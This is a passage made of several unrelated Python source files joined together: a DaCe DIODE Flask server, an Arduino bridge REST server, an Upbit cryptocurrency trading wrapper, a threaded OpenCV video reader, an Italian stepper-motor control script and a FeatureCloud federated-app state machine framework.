ptrns: label = type(p).__name__ nodeids = [] properties = [] if p is not None: sdfg_id = p.sdfg_id sid = p.state_id nodes = list(p.subgraph.values()) for n in nodes: nodeids.append([sdfg_id, sid, n]) properties = dace.serialize.all_properties_to_json(p) optimizations.append({'opt_name': label, 'opt_params': properties, 'affects': nodeids, 'children': []}) opt_per_sdfg[sdfg_name] = {'matching_opts': optimizations} return opt_per_sdfg @app.route("/dace/api/v1.0/dispatcher/<string:op>/", methods=['POST']) def execution_queue_query(op): es = es_ref[0] if op == "list": # List the currently waiting tasks retlist = [] for key, val in es._orphaned_runs.items(): tmp = [''.join(x) for x in val] for x in tmp: d = {} d['index'] = '(done)' d['type'] = 'orphan' d['client_id'] = key d['state'] = 'orphaned' d['output'] = str(x) retlist.append(d) for key, val in es._task_dict.items(): d = {} if val['cmd'] == 'run': d['index'] = key d['type'] = 'run' d['client_id'] = val['cid'] d['options'] = val['opt'] d['state'] = val['state'] elif val['cmd'] == 'control': d['index'] = key d['type'] = 'command' d['client_id'] = val['cid'] d['options'] = val['operation'] d['state'] = val['state'] retlist.append(d) ret = {} ret['elements'] = retlist return jsonify(ret) else: print("Error: op " + str(op) + " not implemented") abort(400) @app.route('/dace/api/v1.0/run/status/', methods=['POST']) def get_run_status(): if not request.json or not 'client_id' in request.json: print("[Error] No client id provided, cannot continue") 
abort(400) es = es_ref[0] # getExecutionOutput returns a generator to output to a HTTP1.1 stream outputgen = es.getExecutionOutput(request.json['client_id']) return Response(outputgen(), mimetype='text/text') @app.route('/dace/api/v1.0/run/', methods=['POST']) def run(): """ This function is equivalent to the old DIODE "Run"-Button. POST-Parameters: (Same as for compile(), language defaults to 'dace') perfmodes: list including every queried mode corecounts: list of core counts (one run for every number of cores) """ try: perfmodes = request.json['perfmodes'] except: perfmodes = ["noperf"] try: corecounts = request.json['corecounts'] except: corecounts = [0] try: repetitions = request.json['repetitions'] except: repetitions = 1 # Obtain the reference es = es_ref[0] client_id = request.json['client_id'] es.addRun(client_id, "start", {}) for pmode in perfmodes: perfopts = {'mode': pmode, 'core_counts': corecounts, 'repetitions': repetitions} tmp = compileProgram(request, 'dace', perfopts) if len(tmp) > 1: sdfgs, code_tuples, dace_state = tmp else: # ERROR print("An error occurred") abort(400) dace_state.repetitions = repetitions more_options = {} more_options['perfopts'] = perfopts runner = es.addRun(client_id, (sdfgs, code_tuples, dace_state), more_options) es.addRun(client_id, "end", {}) # There is no state information with this, just the output # It might be necessary to add a special field that the client has to filter out # to provide additional state information return Response(runner(), mimetype="text/text") @app.route('/dace/api/v1.0/match_optimizer_patterns/', methods=['POST']) def optimize(): """ Returns a list of possible optimizations (transformations) and their properties. POST-Parameters: input_code: list. Contains all necessary input code files optpath: list of dicts, as { name: <str>, params: <dict> }. Contains the current optimization path/tree. This optpath is applied to the provided code before evaluating possible pattern matches. client_id: For identification. May be unique across all runs, must be unique across clients :return: matching_opts: list of dicts, as { opt_name: <str>, opt_params: <dict>, affects: <list>, children: <recurse> }. Contains the matching transformations. `affects` is a list of affected node ids, which must be unique in the current program. """ tmp = compileProgram(request, 'dace') if len(tmp) > 1: sdfgs, code_tuples, dace_state = tmp else: # Error return jsonify({'error': tmp}) opt_per_sdfg = get_transformations(sdfgs) return jsonify(opt_per_sdfg) @app.route('/dace/api/v1.0/compile/<string:language>', methods=['POST']) def compile(language): """ POST-Parameters: sdfg: ser. sdfg: Contains the root SDFG, serialized in JSON-string. If set, options `code` and `sdfg_props` are taken from this value. Can be a list of SDFGs. NOTE: If specified, `code`, `sdfg_prop`, and `language` (in URL) are ignored. code: string/list. Contains all necessary input code files [opt] optpath: list of dicts, as { <sdfg_name/str>: { name: <str>, params: <dict> }}. Contains the current optimization path/tree. This optpath is applied to the provided code before compilation [opt] sdfg_props: list of dicts, as { <sdfg_name/str>: { state_id: <str>, node_id: <str>, params: <dict>, step: <opt int>}}. Contains changes to the default SDFG properties. The step element of the dicts is optional. If it is provided, it specifies the number of optpath elements that preceed it. E.g. a step value of 0 means that the property is applied before the first optimization. 
If it is omitted, the property is applied after all optimization steps, i.e. to the resulting SDFG [opt] perf_mode: string. Providing "null" has the same effect as omission. If specified, enables performance instrumentation with the counter set provided in the DaCe settings. If null (or omitted), no instrumentation is enabled. client_id: <string>: For later identification. May be unique across all runs, must be unique across clients Returns: sdfg: object. Contains a serialization of the resulting SDFGs. generated_code: string. Contains the output code sdfg_props: object. Contains a dict of all properties for every existing node of the sdfgs returned in the sdfg field """ tmp = None try: tmp = compileProgram(request, language) if len(tmp) > 1: sdfgs, code_tuples, dace_state = tmp else: # Error return jsonify({'error': tmp}) opts = get_transformations(sdfgs) compounds = {} for n, s in sdfgs.items(): compounds[n] = { "sdfg": s.to_json(), "matching_opts": opts[n]['matching_opts'], "generated_code": [*map(lambda x: getattr(x, 'code', str(x)), code_tuples[n])] } return jsonify({"compounds": compounds}) except Exception as e: return jsonify({'error': str(e), 'traceback': traceback.format_exc()}) @app.route('/dace/api/v1.0/diode/themes', methods=['GET']) def get_available_ace_editor_themes(): import glob, os.path path = "./webclient/external_lib/ace/" files = [f for f in glob.glob(path + "theme-*.js")] filenames = map(os.path.basename, files) return jsonify([*filenames]) def get_settings(client_id, name="", cv=None, config_path=""): from dace.config import Config if cv is None: clientpath = "./client_configs/" + client_id + ".conf" if os.path.isfile(clientpath): Config.load(clientpath) else: Config.load() if cv is None: cv = Config.get() ret = {} for i, (cname, cval) in enumerate(sorted(cv.items())): cpath = tuple(list(config_path) + [cname]) try: meta = Config.get_metadata(*cpath) # A dict contains more elements if meta['type'] == 'dict': ret[cname] = {"value": get_settings(client_id, cname, cval, cpath), "meta": meta} continue # Other values can be included directly ret[cname] = {"value": cval, "meta": meta} except KeyError: print('WARNING: No metadata for configuration key', cpath) return ret def set_settings(settings_array, client_id): from dace.config import Config if not os.path.isdir("./client_configs"): os.mkdir("./client_configs/") clientpath = "./client_configs/" + client_id + ".conf" if os.path.isfile(clientpath): Config.load(clientpath) else: Config.load() for path, val in settings_array.items(): path = path.split("/") Config.set(*path, value=val) Config.save(clientpath) return Config.get() @app.route('/dace/api/v1.0/preferences/<string:operation>', methods=['POST']) def diode_settings(operation): if operation == "get": client_id = request.json['client_id'] return jsonify(get_settings(client_id)) elif operation == "set": print("request.data: " + str(request.data)) settings = request.json client_id = settings['client_id'] del settings['client_id'] return jsonify(set_settings(settings, client_id)) else: return jsonify({"error": "Unsupported operation"}) @app.route('/dace/api/v1.0/status', methods=['POST']) def status(): # just a kind of ping/pong to see if the server is running return "OK" def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument("-l", "--localhost", action="store_true", help="Bind to localhost only") parser.add_argument("-r", "--remotedace", action="store_true", help="Use ssh commands instead of locally running dace") parser.add_argument("-rd", 
"--restoredace", action="store_true", help="Restore the backup file") parser.add_argument("-e", "--executor", action="store_true", help="Run as an executor server instead of DIODE server") parser.add_argument("-p", "--port", type=int, help="Port to listen on") args = parser.parse_args() if args.restoredace: from dace.config import Config Config.load("./dace.conf.bak") Config.save() remote_execution = args.remotedace es = ExecutorServer() es_ref.append(es) if not args.executor: app.run(host='localhost' if args.localhost else "0.0.0.0", debug=True, port=args.port, use_reloader=False) es.stop() else: import atexit def tmp(): es.stop() atexit.register(tmp) # Wait for an event that will never arrive (passive wait) event = threading.Event() event.wait() if __name__ == '__main__': main()
ServerComm.py
#!/usr/bin/python import urllib2 import urlparse import urllib import json import threading import time import socket import sys from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler from datetime import datetime import sys sys.path.insert(0, '/usr/lib/python2.7/bridge/') from bridgeclient import BridgeClient as bridgeclient NUMIO = 20 SERVER_IP = None SERVER_PORT = None ATmega_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ATmega_socket.connect(('localhost', 6571)) io_state = {} for io in range(NUMIO): io_state[str(io)] = None def keep_alive(): while True: keepalive_endpoint = "http://" + SERVER_IP + ":" + str(SERVER_PORT) + "/keep-alive" try: get = urllib2.Request(keepalive_endpoint) resp = urllib2.urlopen(get, timeout=5) # print resp.read() time.sleep(5) except urllib2.HTTPError, e: print str(datetime.now()), 'HTTPError = ' + str(e.code) except urllib2.URLError, e: print str(datetime.now()), 'URLError = ' + str(e.reason) except (KeyboardInterrupt, SystemExit): print str(datetime.now()), "KeyboardInterrupt" sys.exit() except Exception: import traceback print str(datetime.now()), 'generic exception: ' + traceback.format_exc() def push_update(): db_endpoint = "http://" + SERVER_IP + ":" + str(SERVER_PORT) + "/arduino-to-db" value = bridgeclient() global io_state while True: post = False for io in io_state: new_val = value.get(io) old_val = io_state.get(io) if new_val != old_val: io_state.update({io: new_val}) post = True time.sleep(0.05) if post: print str(datetime.now()), "POSTING TO ENDPOINT ", db_endpoint, print io_state try: io_state_json = json.dumps(io_state) post = urllib2.Request(db_endpoint, io_state_json, {'Content-Type': 'application/json'}) resp = urllib2.urlopen(post, timeout=5) # print resp.read() except urllib2.HTTPError, e: print str(datetime.now()), 'HTTPError = ' + str(e.code) except urllib2.URLError, e: print str(datetime.now()), 'URLError = ' + str(e.reason) except (KeyboardInterrupt, SystemExit): print str(datetime.now()), "KeyboardInterrupt" sys.exit() except Exception: import traceback print str(datetime.now()), 'generic exception: ' + traceback.format_exc() class RestHTTPRequestHandler(BaseHTTPRequestHandler): @staticmethod def parse_query(path): parsed_path = urlparse.urlparse(path) queries = parsed_path.query.split("&") query_dict = {} for q in queries: key, value = q.split("=") query_dict[key] = value return query_dict def do_GET(self): global SERVER_IP global SERVER_PORT if SERVER_IP is not None or SERVER_PORT is not None: try: cmd = urllib.unquote(self.path.split("/")[1]) + "\n" ATmega_socket.send(cmd) self.send_response(200) self.end_headers() except urllib2.HTTPError, e: print str(datetime.now()), 'HTTPError = ' + str(e.code) except urllib2.URLError, e: print str(datetime.now()), 'URLError = ' + str(e.reason) except (KeyboardInterrupt, SystemExit): print str(datetime.now()), "KeyboardInterrupt" sys.exit() except Exception: import traceback print str(datetime.now()), 'generic exception: ' + traceback.format_exc() else: try: queries = self.parse_query(self.path) print str(datetime.now()), "Received Server IP and Port: ", queries SERVER_IP = queries["ip_address"] SERVER_PORT = queries["port"] t1 = threading.Thread(target=push_update) t2 = threading.Thread(target=keep_alive) t1.start() t2.start() self.send_response(200) self.end_headers() except (KeyboardInterrupt, SystemExit): self.send_response(417) self.end_headers() sys.exit() return # def do_POST(self): # new_id = max(filter(lambda x: x['id'], TODOS))['id'] + 1 # 
form = cgi.FieldStorage(fp=self.rfile, # headers=self.headers, environ={ # 'REQUEST_METHOD':'POST', # 'CONTENT_TYPE':self.headers['Content-Type'] # }) # new_title = form['title'].value # new_todo = {'id': new_id, 'title': new_title} # TODOS.append(new_todo) # self.send_response(201) # self.end_headers() # self.wfile.write(json.dumps(new_todo)) # return httpd = HTTPServer(('0.0.0.0', 9898), RestHTTPRequestHandler) while True: httpd.handle_request()
model.py
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 14 03:44:03 2021

@author: kmwh0
"""
'''
send price data to price_queue
method:
    run_tracking()
    while True:
        if not self.price_queue.empty():
            data = price_queue.get()  # receive json data
            print(data)
'''
from multiprocessing import Process
import multiprocessing as mp
import threading
import datetime
import time
from . import upbit as upbit
import asyncio
import os

uuid_list = []
process = None
price_queue = None


def producer(q, t):
    # multiprocessing producer process
    proc = mp.current_process()
    print("Process Name: ", proc.name)
    print(" __name__ : ", __name__)
    print("Thread Name: ", threading.currentThread().getName())
    try:
        asyncio.run(upbit.upbit_websocket(q, t))
    except:
        print("Socket problem: restarting the multiprocessing producer")
        time.sleep(10)
        producer(q, t)


'''
run to get coin price
params: ticker list
'''
def run_tracking(tickers, queue=None):
    global process, price_queue
    if process is None:
        # producer process
        price_queue = queue
        process = Process(name="producer", target=producer, args=(queue, tickers), daemon=True)
        process.start()
    else:
        process.terminate()
        process = None
        # producer process
        process = Process(name="producer", target=producer, args=(price_queue, tickers), daemon=True)
        process.start()


'''
get coin name list
params: ticker list
'''
def get_timing_level():
    return upbit.get_timing_level()


def set_timing_level(level):
    return upbit.set_timing_level(level)


def setKey(access, secret):
    return upbit.setKey(access, secret)


def get_coinlist():
    return upbit.get_upbit_coinlist()


def get_orderlist():
    return upbit.get_orderlist()


def order(name, price, count):
    return upbit.order(name, price, count)


def get_purchased(uuid):
    return upbit.check_purchased(uuid)


# return dataframe
def get_analyze(coinlist):
    return upbit.get_analyze(coinlist)


# return dataframe
def get_analyze_scalping(coinlist):
    return upbit.get_analyze_scalping(coinlist)


def get_target(coinname: str, interval: str, k, count):
    return upbit.get_target(coinname, interval, k, count)


def get_average(coinlist, interval, count):
    return upbit.get_average(coinlist, interval, count)


def get_realtiming():
    return upbit.real_timing


def get_timingname():
    return upbit.timing


def get_start_time(interval):
    return upbit.get_start_time(interval)


def buy_crypto(name, price=None, volume=None):
    return upbit.buy_crypto(name, price, volume)


def sell_crypto(name):
    return upbit.sell_crypto(name)


def get_market_price(name, unit="1"):
    return upbit.get_market_price(name, unit)


if __name__ == '__main__':
    run_tracking([["KRW-XRP"]])
    print("I am the parent process")
    time.sleep(5)
    os.system("pause")
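The module docstring above sketches the intended consumption pattern; the snippet below spells it out. It is illustrative only: the package-relative import and the function name are assumptions, and it presumes that upbit.upbit_websocket() pushes JSON price messages onto the queue.

# Hedged consumer sketch (illustration only), following the module docstring
# above: run_tracking() starts the websocket producer process and the caller
# drains the queue. Assumes this file is importable as `model` from within
# the same package.
import multiprocessing as mp

from . import model


def consume_prices():
    price_queue = mp.Queue()
    model.run_tracking([["KRW-BTC"]], queue=price_queue)
    while True:
        if not price_queue.empty():
            data = price_queue.get()  # one JSON price message from the websocket
            print(data)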
video_reader.py
import numpy as np
import cv2
import threading
import time


class VideoReader():
    """Read frames from a video file on a background thread."""

    def __init__(self, video_path):
        self.video_path = video_path
        self.vid_cap = cv2.VideoCapture(self.video_path)
        self.frame_time = (1 / self.vid_cap.get(cv2.CAP_PROP_FPS)) * 1000  # in ms
        self.cur_frame = np.zeros((416, 416, 3), np.uint8)
        self.frame_num = 0
        self.is_started = False
        self.frame_lock = threading.Lock()
        self.read_thread = threading.Thread(target=self.read_thread_func)
        self.read_thread.daemon = True
        self.read_thread.start()

    def reset(self):
        # Reopen the capture and restart the background reader thread.
        self.vid_cap = cv2.VideoCapture(self.video_path)
        self.cur_frame = np.zeros((416, 416, 3), np.uint8)
        self.read_thread = threading.Thread(target=self.read_thread_func)
        self.read_thread.daemon = True
        self.read_thread.start()

    def read_thread_func(self):
        while True:
            if self.is_started:
                ret, frame = self.vid_cap.read()
                self.frame_lock.acquire()
                if ret:
                    self.cur_frame = frame.copy()
                else:
                    # Video has finished being read
                    self.cur_frame = None
                self.frame_lock.release()
                # End thread
                if frame is None:
                    break
            time.sleep(self.frame_time / 1000)
            #cv2.imshow("hmm", frame)
            #cv2.waitKey(int(self.frame_time))

    def read(self):
        if self.frame_num >= 1:
            # Needed because the very first detection frame takes its own sweet time
            self.is_started = True
        frame = None
        self.frame_lock.acquire()
        if self.cur_frame is not None:
            frame = self.cur_frame.copy()
        self.frame_lock.release()
        self.frame_num += 1
        # Return the copy taken under the lock (None once the video has ended).
        return None, frame
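A short usage sketch follows; it is illustrative only (the module name `video_reader` and the sample file path are assumptions) and simply polls read() until the background thread signals the end of the video with None.

# Hedged usage sketch (illustration only). Assumes the class above lives in a
# module importable as `video_reader` and that 'sample.mp4' exists.
import cv2

from video_reader import VideoReader

reader = VideoReader('sample.mp4')
while True:
    _, frame = reader.read()
    if frame is None:  # the background thread sets the frame to None at EOF
        break
    cv2.imshow('frame', frame)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cv2.destroyAllWindows()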
scovolini.py
#!/usr/bin/python
import sys
import os
import argparse
import time
import json
import signal
import traceback
import threading

from stepper import Stepper
import ui

# ----- global variables ------
VERSION_MAJOR = 1
VERSION_MINOR = 0
VERSION_PATCH = 0

CONFIG_FILE = "config.json"
DEFAULT_SPEED = 70

save_configuration = False
steps_per_cycle = 0
speed = 0
debug_mode = False


# ---------- functions -------------
def parse_input():
    parser = argparse.ArgumentParser()
    parser.add_argument('cicli', type=int, help="Numero di cicli da effettuare")
    parser.add_argument('--vel', type=int, default=0, help="Velocita' dello scovolino (opzionale)")
    parser.add_argument('--taratura', action='store_true',
                        help="Avvia la procedura per impostare di quanto avanza lo scovolino ad ogni ciclo (opzionale)")
    parser.add_argument('--debug', action='store_true', help="Lancia il programma in modalita' debug")
    return parser.parse_args()


def taratura():
    os.system("clear")
    print("-------------------------------")
    print("| Avvio procedura di taratura |")
    print("-------------------------------\n\n")
    raw_input("Portare lo scovolino in posizione di massima estensione e premere [INVIO].\n")
    print("Ora lo scovolino tornera' indietro, premere [INVIO] quando si e' soddisfatti della posizione raggiunta.\n")
    raw_input("Premere [INVIO] per iniziare.")
    print("Inizio taratura...")
    time.sleep(2)

    d = {'key_pressed': False}

    def wait_enter():
        raw_input()
        d['key_pressed'] = True

    steps_per_cycle = 0
    with Stepper() as stepper:
        threading.Thread(target=wait_enter).start()
        while not d['key_pressed']:
            stepper.stepBackwards()
            steps_per_cycle += 1
            time.sleep(0.1)
        stepper.stepForward(steps_per_cycle)  # go back to initial position

    print("Taratura completata!\n")
    time.sleep(2)
    os.system("clear")
    return steps_per_cycle


def load_params(args):
    vel = args.vel
    steps = 0
    if not args.taratura:
        try:
            with open(CONFIG_FILE) as config_file:
                config = json.load(config_file)
                steps = config['steps_per_cycle']
                if vel == 0:
                    vel = config['speed']
        except IOError:
            if debug_mode:
                traceback.print_exc()
            print("Attenzione! File di configurazione non trovato!")
            print("Ripetere la taratura.")
            exit()
    else:
        steps = taratura()
    if vel == 0:
        print("Velocita' di default: " + str(DEFAULT_SPEED))
        vel = DEFAULT_SPEED
    return vel, steps


def exit_program(signum=None, frame=None):
    # Accepts the (signum, frame) arguments so it can double as the SIGINT handler.
    os.system("clear")
    if save_configuration:
        try:
            if os.path.isfile(CONFIG_FILE):
                os.remove(CONFIG_FILE)
            with open(CONFIG_FILE, 'w') as config_file:
                json.dump({'speed': speed, 'steps_per_cycle': steps_per_cycle}, config_file)
        except IOError:
            if debug_mode:
                traceback.print_exc()
                raw_input("")
            print("Impossibile salvare la configurazione corrente!")
            time.sleep(3)
    os.system("clear")
    print("FINE!")
    time.sleep(3)
    os.system("clear")
    sys.exit(0)


# ------------------ PROGRAM --------------------------------------
def main():
    # Declare the module-level state so exit_program() sees the real values
    # (plain assignments here would only create locals).
    global save_configuration, steps_per_cycle, speed, debug_mode

    signal.signal(signal.SIGINT, exit_program)
    try:
        args = parse_input()
        debug_mode = args.debug
        ui.splash_screen()
        speed, steps_per_cycle = load_params(args)
        save_configuration = True
        with Stepper() as stepper:
            stepper.setSpeed(speed)
            for i in range(args.cicli):
                os.system("clear")
                print("Velocita': " + str(speed))
                print("Cicli: " + str(i + 1) + "/" + str(args.cicli))
                print("\nPremere CTRL+C per bloccare")
                stepper.stepBackwards(steps_per_cycle)
                stepper.stepForward(steps_per_cycle)
    except Exception:
        if debug_mode:
            traceback.print_exc()
            raw_input("")
        os.system("clear")
        print("Si e' verificato un errore imprevisto!")
        time.sleep(3)
    exit_program()


if __name__ == "__main__":
    main()
app.py
import abc import datetime import json import numpy as np import pickle import sys import threading import traceback from enum import Enum from time import sleep from typing import Dict, List, Tuple, Union, TypedDict, Literal DATA_POLL_INTERVAL = 0.1 # Interval (seconds) to check for new data pieces, adapt if necessary TERMINAL_WAIT = 10 # Time (seconds) to wait before final shutdown, to allow the controller to pick up the newest # progress etc. TRANSITION_WAIT = 1 # Time (seconds) to wait between state transitions class Role(Enum): PARTICIPANT = (True, False) COORDINATOR = (False, True) BOTH = (True, True) class State(Enum): RUNNING = 'running' ERROR = 'error' ACTION = 'action_required' class SMPCOperation(Enum): ADD = 'add' MULTIPLY = 'multiply' class SMPCSerialization(Enum): JSON = 'json' class LogLevel(Enum): DEBUG = 'info' ERROR = 'error' FATAL = 'fatal' class SMPCType(TypedDict): operation: Literal['add', 'multiply'] serialization: Literal['json'] shards: int exponent: int class App: """ Implementing the workflow for the FeatureCloud platform. Attributes ---------- id: str coordinator: bool clients: list status_available: bool status_finished: bool status_message: str status_progress: float status_state: str status_destination: str status_smpc: dict default_smpc: dict data_incoming: list data_outgoing: list thread: threading.Thread states: Dict[str, AppState] transitions: Dict[str, Tuple[AppState, AppState, bool, bool]] transition_log: List[Tuple[datetime.datetime, str]] internal: dict current_state: str Methods ------- handle_setup(client_id, coordinator, clients) handle_incoming(data) handle_outgoing() guarded_run() run() register() _register_state(name, state, participant, coordinator, **kwargs) register_transition(name, source, participant, coordinator) transition() log() """ def __init__(self): self.id = None self.coordinator = None self.clients = None self.thread: Union[threading.Thread, None] = None self.status_available: bool = False self.status_finished: bool = False self.status_message: Union[str, None] = None self.status_progress: Union[float, None] = None self.status_state: Union[str, None] = None self.status_destination: Union[str, None] = None self.status_smpc: Union[SMPCType, None] = None self.data_incoming = [] self.data_outgoing = [] self.default_smpc: SMPCType = {'operation': 'add', 'serialization': 'json', 'shards': 0, 'exponent': 8} self.current_state: Union[AppState, None] = None self.states: Dict[str, AppState] = {} self.transitions: Dict[ str, Tuple[AppState, AppState, bool, bool]] = {} # name => (source, target, participant, coordinator) self.transition_log: List[Tuple[datetime.datetime, str]] = [] self.internal = {} # Add terminal state @app_state('terminal', Role.BOTH, self) class TerminalState(AppState): def register(self): pass def run(self) -> str: pass def handle_setup(self, client_id, coordinator, clients): """ It will be called on startup and contains information about the execution context of this instance. And registers all of the states. 
Parameters ---------- client_id: str coordinator: bool clients: list """ self.id = client_id self.coordinator = coordinator self.clients = clients self.log(f'id: {self.id}') self.log(f'coordinator: {self.coordinator}') self.log(f'clients: {self.clients}') self.current_state = self.states.get('initial') if not self.current_state: self.log('initial state not found', level=LogLevel.FATAL) self.thread = threading.Thread(target=self.guarded_run) self.thread.start() def guarded_run(self): """ run the workflow while trying to catch possible exceptions """ try: self.run() except Exception as e: # catch all # noqa self.log(traceback.format_exc()) self.status_message = e.__class__.__name__ self.status_state = State.ERROR.value self.status_finished = True def run(self): """ Runs the workflow, logs the current state, executes it, and handles the transition to the next desired state. Once the app transits to the terminal state, the workflow will be terminated. """ while True: self.log(f'state: {self.current_state.name}') transition = self.current_state.run() self.log(f'transition: {transition}') self.transition(f'{self.current_state.name}_{transition}') if self.current_state.name == 'terminal': self.status_progress = 1.0 self.log(f'done') sleep(TERMINAL_WAIT) self.status_finished = True return sleep(TRANSITION_WAIT) def register(self): """ Registers all of the states transitions it should be called once all of the states are registered. """ for s in self.states: state = self.states[s] state.register() def handle_incoming(self, data, client): """ When new data arrives, it appends it to the `data_incoming` attribute to be accessible for app states. Parameters ---------- data: list encoded data client: str Id of the client that Sent the data """ self.data_incoming.append((data, client)) def handle_outgoing(self): """ When it is requested to send some data to other client/s it will be called to deliver the data to the FeatureCloud Controller. """ if len(self.data_outgoing) == 0: return None data = self.data_outgoing[0] self.data_outgoing = self.data_outgoing[1:] if len(self.data_outgoing) == 0: self.status_available = False self.status_destination = None self.status_smpc = None else: self.status_available = True self.status_smpc = self.default_smpc if self.data_outgoing[0][1] else None self.status_destination = self.data_outgoing[0][2] return data[0] def _register_state(self, name, state, participant, coordinator, **kwargs): """ Instantiates a state, provides app-level information and adds it as part of the app workflow. Parameters ---------- name: str state: AppState participant: bool coordinator: bool """ if self.transitions.get(name): self.log(f'state {name} already exists', level=LogLevel.FATAL) si = state(**kwargs) si._app = self si.name = name si.participant = participant si.coordinator = coordinator self.states[si.name] = si def register_transition(self, name: str, source: str, target: str, participant=True, coordinator=True): """ Receives transition registration parameters, check the validity of its logic, and consider it as one possible transitions in the workflow. There will be exceptions if apps try to register a transition with contradicting roles. 
Parameters ---------- name: str Name of the transition source: str Name of the source state target: str Name of the target state participant: bool Indicates whether the transition is allowed for participant role coordinator: bool Indicates whether the transition is allowed for the coordinator role """ if not participant and not coordinator: self.log('either participant or coordinator must be True', level=LogLevel.FATAL) if self.transitions.get(name): self.log(f'transition {name} already exists', level=LogLevel.FATAL) source_state = self.states.get(source) if not source_state: self.log(f'source state {source} not found', level=LogLevel.FATAL) if participant and not source_state.participant: self.log(f'source state {source} not accessible for participants', level=LogLevel.FATAL) if coordinator and not source_state.coordinator: self.log(f'source state {source} not accessible for the coordinator', level=LogLevel.FATAL) target_state = self.states.get(target) if not target_state: self.log(f'target state {target} not found', level=LogLevel.FATAL) if participant and not target_state.participant: self.log(f'target state {target} not accessible for participants', level=LogLevel.FATAL) if coordinator and not target_state.coordinator: self.log(f'target state {target} not accessible for the coordinator', level=LogLevel.FATAL) self.transitions[name] = (source_state, target_state, participant, coordinator) def transition(self, name): """ Transits the app workflow to the unique next state based on current states, the role of the FeatureCloud client, and requirements of registered transitions for the current state. Parameters ---------- name: str Name of the transition(which includes name of current and the next state). """ transition = self.transitions.get(name) if not transition: self.log(f'transition {name} not found', level=LogLevel.FATAL) if transition[0] != self.current_state: self.log(f'current state unequal to source state', level=LogLevel.FATAL) if not transition[2] and not self.coordinator: self.log(f'cannot perform transition {name} as participant', level=LogLevel.FATAL) if not transition[3] and self.coordinator: self.log(f'cannot perform transition {name} as coordinator', level=LogLevel.FATAL) self.transition_log.append((datetime.datetime.now(), name)) self.current_state = transition[1] def log(self, msg, level: LogLevel = LogLevel.DEBUG): """ Prints a log message or raises an exception according to the log level. 
Parameters ---------- msg : str message to be displayed level : LogLevel, default=LogLevel.DEBUG determines the channel (stdout, stderr) or whether to trigger an exception """ msg = f'[Time: {datetime.datetime.now().strftime("%d.%m.%y %H:%M:%S")}] [Level: {level.value}] {msg}' if level == LogLevel.FATAL: raise RuntimeError(msg) if level == LogLevel.ERROR: print(msg, flush=True, file=sys.stderr) else: print(msg, flush=True) class AppState(abc.ABC): """ Defining custom states Attributes: ----------- app: App name: str participant: bool coordinator: bool Methods: -------- register() run() register_transition(target, role, name) aggregate_data(operation, use_smpc) gather_data(is_json) await_data(n, unwrap, is_json) send_data_to_participant(data, destination) configure_smpc(exponent, shards, operation, serialization) send_data_to_coordinator(data, send_to_self, use_smpc) broadcast_data(data, send_to_self) update(message, progress, state) """ def __init__(self): self._app = None self.name = None self.participant = None self.coordinator = None @abc.abstractmethod def register(self): """ This is an abstract method that should be implemented by developers it calls AppState.register_transition to register transitions for state. it will be called in App.register method so that, once all states are defined, in a verifiable way, all app transitions can be registered. """ @abc.abstractmethod def run(self) -> str: """ It is an abstract method that should be implemented by developers, to execute all local or global operation and calculations of the state. It will be called in App.run() method so that the state perform its operations. """ @property def is_coordinator(self): return self._app.coordinator @property def clients(self): return self._app.clients @property def id(self): return self._app.id def register_transition(self, target: str, role: Role = Role.BOTH, name: str or None = None): """ Registers a transition in the state machine. Parameters ---------- target : str name of the target state role : Role, default=Role.BOTH role for which this transition is valid name : str or None, default=None name of the transition """ if not name: name = target participant, coordinator = role.value self._app.register_transition(f'{self.name}_{name}', self.name, target, participant, coordinator) def aggregate_data(self, operation: SMPCOperation, use_smpc=False): """ Waits for all participants (including the coordinator instance) to send data and returns the aggregated value. Parameters ---------- operation : SMPCOperation specifies the aggregation type use_smpc : bool, default=False if True, the data to be aggregated is expected to stem from an SMPC aggregation Returns ---------- aggregated value """ if use_smpc: return self.await_data(1, unwrap=True, is_json=True) # Data is aggregated already else: data = self.gather_data(is_json=False) return _aggregate(data, operation) # Data needs to be aggregated according to operation def gather_data(self, is_json=False): """ Waits for all participants (including the coordinator instance) to send data and returns a list containing the received data pieces. Only valid for the coordinator instance. 
Parameters ---------- is_json : bool, default=False if True, expects a JSON serialized values and deserializes it accordingly Returns ---------- list of n data pieces, where n is the number of participants """ if not self._app.coordinator: self._app.log('must be coordinator to use gather_data', level=LogLevel.FATAL) return self.await_data(len(self._app.clients), unwrap=False, is_json=is_json) def await_data(self, n: int = 1, unwrap=True, is_json=False): """ Waits for n data pieces and returns them. Parameters ---------- n : int, default=1 number of data pieces to wait for unwrap : bool, default=True if True, will return the first element of the collected data (only useful if n = 1) is_json : bool, default=False if True, expects JSON serialized values and deserializes it accordingly Returns ---------- list of data pieces (if n > 1 or unwrap = False) or a single data piece (if n = 1 and unwrap = True) """ while True: if len(self._app.data_incoming) >= n: data = self._app.data_incoming[:n] self._app.data_incoming = self._app.data_incoming[n:] if n == 1 and unwrap: return _deserialize_incoming(data[0][0], is_json=is_json) else: return [_deserialize_incoming(d[0]) for d in data] sleep(DATA_POLL_INTERVAL) def send_data_to_participant(self, data, destination): """ Sends data to a particular participant identified by its ID. Parameters ---------- data : object data to be sent destination : str destination client ID """ data = _serialize_outgoing(data, is_json=False) if destination == self._app.id: self._app.data_incoming.append((data, self._app.id)) else: self._app.data_outgoing.append((data, False, destination)) self._app.status_destination = destination self._app.status_smpc = None self._app.status_available = True def send_data_to_coordinator(self, data, send_to_self=True, use_smpc=False): """ Sends data to the coordinator instance. Parameters ---------- data : object data to be sent send_to_self : bool, default=True if True, the data will also be sent internally to this instance (only applies to the coordinator instance) use_smpc : bool, default=False if True, the data will be sent as part of an SMPC aggregation step """ data = _serialize_outgoing(data, is_json=use_smpc) if self._app.coordinator and not use_smpc: if send_to_self: self._app.data_incoming.append((data, self._app.id)) else: self._app.data_outgoing.append((data, use_smpc, None)) self._app.status_destination = None self._app.status_smpc = self._app.default_smpc if use_smpc else None self._app.status_available = True def broadcast_data(self, data, send_to_self=True): """ Broadcasts data to all participants (only valid for the coordinator instance). Parameters ---------- data : object data to be sent send_to_self : bool if True, the data will also be sent internally to this coordinator instance """ data = _serialize_outgoing(data, is_json=False) if not self._app.coordinator: self._app.log('only the coordinator can broadcast data', level=LogLevel.FATAL) self._app.data_outgoing.append((data, False, None)) self._app.status_destination = None self._app.status_smpc = None self._app.status_available = True if 